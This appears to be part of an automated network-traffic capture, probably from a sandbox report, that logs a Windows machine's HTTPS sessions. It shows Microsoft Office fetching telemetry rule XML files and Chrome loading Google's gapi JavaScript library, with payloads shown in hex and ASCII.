2024-11-09 01:47:19 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:19 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBAD04B7B" x-ms-request-id: 2e71ae26-601e-0097-6701-2df33a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014719Z-16547b76f7fp6mhthC1DFWrggn0000000ap000000000347f x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:19 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.7	49727	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:19 UTC	192	OUT	GET /rules/rule120616v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:19 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:19 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB344914B" x-ms-request-id: 4fda4cb6-f01e-003f-2793-31d19d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014719Z-17df447cdb5g2j9ghC1DFWuyag00000000yg00000000fgpe x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:19 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.7	49728	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:19 UTC	192	OUT	GET /rules/rule120617v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:19 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:19 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT ETag: "0x8DC582BA310DA18" x-ms-request-id: ea0f8f90-301e-0020-7758-2e6299000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014719Z-15869dbbcc6sg5zbhC1DFWy5u800000002e000000000ccen x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:19 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.7	49731	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:19 UTC	192	OUT	GET /rules/rule120618v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:19 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:19 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT ETag: "0x8DC582B9018290B" x-ms-request-id: def873b9-d01e-0065-46f7-2cb77a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014719Z-16547b76f7f9rdn9hC1DFWfk7s0000000ab000000000qw9k x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:19 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49730	142.250.186.142	443	7364	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:19 UTC	729	OUT	GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1 Host: apis.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlKHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-09 01:47:19 UTC	915	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access" Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]} Content-Length: 117949 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Fri, 08 Nov 2024 07:44:13 GMT Expires: Sat, 08 Nov 2025 07:44:13 GMT Cache-Control: public, max-age=31536000 Last-Modified: Thu, 10 Oct 2024 19:55:27 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding Age: 64986 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-09 01:47:19 UTC	463	IN	Data Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 30 78 38 30 30 30 30 30 2c 20 5d 29 3b 0a 76 61 72 20 64 61 2c 65 61 2c 68 61 2c 6e 61 2c 6f 61 2c 73 61 2c 74 61 2c 77 61 3b 64 61 3d 66 75 6e Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([0x800000, ]);var da,ea,ha,na,oa,sa,ta,wa;da=fun
2024-11-09 01:47:19 UTC	1378	IN	Data Raw: 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 Data Ascii: totype)return a;a[b]=c.value;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)retu
2024-11-09 01:47:19 UTC	1378	IN	Data Raw: 61 72 20 62 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 62 29 72 65 74 75 72 6e 20 62 2e 63 61 6c 6c 28 61 29 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 3d 3d 22 6e 75 6d 62 65 72 22 29 72 65 74 75 72 6e 7b 6e 65 78 74 3a 64 61 28 61 29 7d 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 62 60 22 2b 53 74 72 69 6e 67 28 61 29 29 3b 7d 3b 73 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 62 29 7d 3b 74 61 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 61 73 Data Ascii: ar b=typeof Symbol!="undefined"&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if(typeof a.length=="number")return{next:da(a)};throw Error("b`"+String(a));};sa=function(a,b){return Object.prototype.hasOwnProperty.call(a,b)};ta=typeof Object.as
2024-11-09 01:47:19 UTC	1378	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 46 61 3d 30 3b 74 68 69 73 2e 77 66 3d 76 6f 69 64 20 30 3b 74 68 69 73 2e 4e 72 3d 5b 5d 3b 74 68 69 73 2e 68 56 3d 21 31 3b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 74 72 79 7b 68 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 63 61 74 63 68 28 6c 29 7b 6b 2e 72 65 6a 65 63 74 28 6c 29 7d 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6a 46 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 68 28 6d 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6c 7c 7c 28 6c 3d 21 30 2c 6d 2e 63 61 6c 6c 28 6b 2c 6e 29 29 7d 7d 76 61 72 20 6b 3d 74 68 69 73 2c 6c 3d 21 31 3b 72 65 74 75 72 6e 7b 72 65 73 6f 6c 76 65 3a 68 28 74 68 69 73 2e 53 64 61 29 2c 72 65 6a 65 63 74 Data Ascii: function(h){this.Fa=0;this.wf=void 0;this.Nr=[];this.hV=!1;var k=this.jF();try{h(k.resolve,k.reject)}catch(l){k.reject(l)}};e.prototype.jF=function(){function h(m){return function(n){l\|\|(l=!0,m.call(k,n))}}var k=this,l=!1;return{resolve:h(this.Sda),reject
2024-11-09 01:47:19 UTC	1378	IN	Data Raw: 70 72 6f 6d 69 73 65 3d 74 68 69 73 3b 68 2e 72 65 61 73 6f 6e 3d 74 68 69 73 2e 77 66 3b 72 65 74 75 72 6e 20 6c 28 68 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 47 37 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 4e 72 21 3d 6e 75 6c 6c 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 74 68 69 73 2e 4e 72 2e 6c 65 6e 67 74 68 3b 2b 2b 68 29 66 2e 58 4f 28 74 68 69 73 2e 4e 72 5b 68 5d 29 3b 0a 74 68 69 73 2e 4e 72 3d 6e 75 6c 6c 7d 7d 3b 76 61 72 20 66 3d 6e 65 77 20 62 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 79 66 61 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 68 2e 69 79 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 7a 66 61 3d 66 75 6e 63 Data Ascii: promise=this;h.reason=this.wf;return l(h)};e.prototype.G7=function(){if(this.Nr!=null){for(var h=0;h<this.Nr.length;++h)f.XO(this.Nr[h]);this.Nr=null}};var f=new b;e.prototype.yfa=function(h){var k=this.jF();h.iy(k.resolve,k.reject)};e.prototype.zfa=func
2024-11-09 01:47:19 UTC	1378	IN	Data Raw: 6f 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 74 6f 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 61 20 72 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 22 29 3b 72 65 74 75 72 6e 20 61 2b 22 22 7d 3b 0a 6e 61 28 22 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 73 74 61 72 74 73 57 69 74 68 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 76 61 72 20 64 3d 45 61 28 74 68 69 73 2c 62 2c 22 73 74 61 72 74 73 57 69 74 68 22 29 2c 65 3d 64 2e 6c 65 6e 67 74 68 2c 66 3d 62 2e 6c 65 6e 67 74 68 3b 63 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 4d 61 74 68 2e 6d 69 6e 28 63 7c 30 2c 64 2e 6c 65 6e 67 74 68 29 29 3b 66 6f Data Ascii: or("First argument to String.prototype."+c+" must not be a regular expression");return a+""};na("String.prototype.startsWith",function(a){return a?a:function(b,c){var d=Ea(this,b,"startsWith"),e=d.length,f=b.length;c=Math.max(0,Math.min(c\|0,d.length));fo
2024-11-09 01:47:19 UTC	1378	IN	Data Raw: 72 20 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 47 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 72 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 65 22 29 3b 64 28 6c 29 3b 69 66 28 21 73 61 28 6c 2c 66 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 66 60 22 2b 6c 29 3b 6c 5b 66 5d 5b 74 68 69 73 2e 47 61 5d 3d 6d 3b 72 65 74 75 72 6e 20 74 Data Ascii: r h=0,k=function(l){this.Ga=(h+=Math.random()+1).toString();if(l){l=_.ra(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw Error("e");d(l);if(!sa(l,f))throw Error("f`"+l);l[f][this.Ga]=m;return t
2024-11-09 01:47:19 UTC	1378	IN	Data Raw: 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 52 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 52 6b 3d 0a 6b 2e 5a 65 2e 52 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 74 68 69 73 5b 31 5d 2e 52 6b 3d 66 28 29 3b 74 68 69 73 Data Ascii: e=function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length\|\|delete this[0][k.id],k.Ze.Rk.next=k.Ze.next,k.Ze.next.Rk=k.Ze.Rk,k.Ze.head=null,this.size--,!0):!1};c.prototype.clear=function(){this[0]={};this[1]=this[1].Rk=f();this
2024-11-09 01:47:19 UTC	1378	IN	Data Raw: 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 72 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e 65 78 74 28 29 3b 69 66 28 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 21 3d 63 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 63 29 72 Data Ascii: pe.entries\|\|typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.ra([c]));if(!d.has(c)\|\|d.size!=1\|\|d.add(c)!=d\|\|d.size!=1\|\|d.add({x:4})!=d\|\|d.size!=2)return!1;var e=d.entries(),f=e.next();if(f.done\|\|f.value[0]!=c\|\|f.value[1]!=c)r
2024-11-09 01:47:19 UTC	1378	IN	Data Raw: 2b 39 32 31 36 7d 7d 7d 29 3b 0a 6e 61 28 22 53 74 72 69 6e 67 2e 66 72 6f 6d 43 6f 64 65 50 6f 69 6e 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 66 6f 72 28 76 61 72 20 63 3d 22 22 2c 64 3d 30 3b 64 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 7b 76 61 72 20 65 3d 4e 75 6d 62 65 72 28 61 72 67 75 6d 65 6e 74 73 5b 64 5d 29 3b 69 66 28 65 3c 30 7c 7c 65 3e 31 31 31 34 31 31 31 7c 7c 65 21 3d 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 69 6e 76 61 6c 69 64 5f 63 6f 64 65 5f 70 6f 69 6e 74 20 22 2b 65 29 3b 65 3c 3d 36 35 35 33 35 3f 63 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 Data Ascii: +9216}}});na("String.fromCodePoint",function(a){return a?a:function(b){for(var c="",d=0;d<arguments.length;d++){var e=Number(arguments[d]);if(e<0\|\|e>1114111\|\|e!==Math.floor(e))throw new RangeError("invalid_code_point "+e);e<=65535?c+=String.fromCharCode(

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.7	49732	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:19 UTC	192	OUT	GET /rules/rule120619v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:19 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:19 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT ETag: "0x8DC582B9698189B" x-ms-request-id: 09da145b-201e-0033-5108-32b167000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014719Z-16547b76f7fr4g8xhC1DFW9cqc00000009q00000000077f9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-09 01:47:19 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

